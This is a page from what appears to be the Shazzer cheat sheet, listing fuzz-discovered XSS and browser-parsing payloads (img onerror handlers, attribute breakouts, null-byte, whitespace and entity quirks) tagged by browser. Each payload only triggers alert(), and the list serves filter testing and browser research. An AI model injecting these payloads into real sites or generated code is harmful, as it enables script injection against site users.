Shazzer logo

Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 169 vectors with results

<0x00h1>sample</h1>
HTMLHTML ParsingChrome
<img0x00onerror=alert() src=x />
Author: tr3w
HTMLDOM BehaviorChrome
prompt?.();alert(63)
JSXSS ExecutionChromeMicrosoft Edge
alert0x09();alert(9)
JSXSS ExecutionChrome
alert
();alert(10)
JSXSS ExecutionChrome
alert0x0B();alert(11)
JSXSS ExecutionChrome
alert0x0C();alert(12)
JSXSS ExecutionChrome
alert0x0D();alert(13)
JSXSS ExecutionChrome
eval('0x09alert(9)0x09')
JSJavaScript SyntaxFirefoxChrome
eval('0x0Balert(11)0x0B')
JSJavaScript SyntaxFirefoxChrome
eval('0x0Calert(12)0x0C')
JSJavaScript SyntaxFirefoxChrome
eval(' alert(32) ')
JSJavaScript SyntaxFirefoxChrome
eval(';alert(59);')
JSJavaScript SyntaxFirefoxChrome
<div a="><!-- "></div><img src=x:x onerror=alert(34) -->
XSSHTML ParsingChromeFirefoxSafari
<div a='><!-- '></div><img src=x:x onerror=alert(39) -->
XSSHTML ParsingChromeFirefoxSafari
<div 0x09="><img src=x:x onerror=alert(9)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div 
="><img src=x:x onerror=alert(10)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div 0x0C="><img src=x:x onerror=alert(12)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div 0x0D="><img src=x:x onerror=alert(13)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div  ="><img src=x:x onerror=alert(32)>"></div>
XSSDOM BehaviorChromeFirefoxSafari
<div a="><!-- "></div><img src=x:x onerror=alert(34) -->
XSSHTML ParsingFirefoxSafariChrome
<div a='><!-- '></div><img src=x:x onerror=alert(39) -->
XSSHTML ParsingFirefoxSafariChrome
if (new URL("https://" + String.fromCodePoint(91) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(91)}
JSURL HandlingFirefoxSafariChrome
if (new URL("https://" + String.fromCodePoint(65095) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65095)}
JSURL HandlingFirefoxSafariChrome
if (new URL("https://" + String.fromCodePoint(65339) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65339)}
JSURL HandlingFirefoxSafariChrome
"0x091337"==1337&&alert(9)
JSCharacter EncodingChromeFirefoxSafari
"0x0B1337"==1337&&alert(11)
JSCharacter EncodingChromeFirefoxSafari
"0x0C1337"==1337&&alert(12)
JSCharacter EncodingChromeFirefoxSafari
" 1337"==1337&&alert(32)
JSCharacter EncodingChromeFirefoxSafari
"+1337"==1337&&alert(43)
JSCharacter EncodingChromeFirefoxSafari
({"x\0x0D0x0D
":1337}.x)==1337&&alert(13)
JSXSS ExecutionChromeFirefoxSafari
"x\
"==="x" && alert(10)
JSXSS ExecutionChromeFirefoxSafari
"x\0x0D"==="x" && alert(13)
JSXSS ExecutionChromeFirefoxSafari
"x\
"==="x" && alert(8232)
JSXSS ExecutionChromeFirefoxSafari
"x\
"==="x" && alert(8233)
JSXSS ExecutionChromeFirefoxSafari
<img src=data: onerror="1&gt alert(65279)">
XSSHTML ParsingSafariChrome
<img src=data: onerror="1&gt
 alert(8232)">
XSSHTML ParsingSafariChrome
<img src=data: onerror="1&gt> alert(62)">
XSSHTML ParsingSafariChrome
<img src=data: onerror="1&gt~ alert(126)">
XSSHTML ParsingSafariChrome
<img src=data: onerror="1&gt  alert(12288)">
XSSHTML ParsingSafariChrome
<form id="test" action="aaa0x00onsubmit=alert(1)><input/type='submit'>0x0D
XSSDOM BehaviorChrome
<img src=data: onerror="1&amp-alert(45)">
XSSEntity ParsingSafariChromeFirefox
<img src=data: onerror="1&amp
alert(10)">
XSSEntity ParsingSafariChromeFirefox
<img src=data: onerror="1&amp alert(8201)">
XSSEntity ParsingSafariChromeFirefox
<img src=data: onerror="1&amp alert(8192)">
XSSEntity ParsingSafariChromeFirefox
<img src=data: onerror="1&amp alert(8195)">
XSSEntity ParsingSafariChromeFirefox
<img src="0x00<iframe><!--">
Source: Quotes
Author: dogspyagent
XSSHTML ParsingChrome
<div id="test" style="00⟧onload="alert(1)">hello</div>
XSSCSS ParsingChrome
<img src="/image.png" tag="0x00><iframe><!--">
XSSDOM BehaviorChrome
<div id="test" style='0x00onload="alert(1)">hello</div>
XSSCSS ParsingChromeFirefox
var targets=['"','\'','<','/','>','\\']0x0D
if (targets.includes('0x00'.toUpperCase())) {0x0D
    alert(0+' (normal) (0x00 -> '+"0x00".toUpperCase()+')')0x0D
}0x0D
0x0D
if (targets.includes('0x00'.toLocaleUpperCase())) {0x0D
    alert(0+' (locale) (0x00 -> '+"0x00".toLocaleUpperCase()+')')0x0D
}
JSJavaScript SyntaxChromeFirefox

Page 6 of 9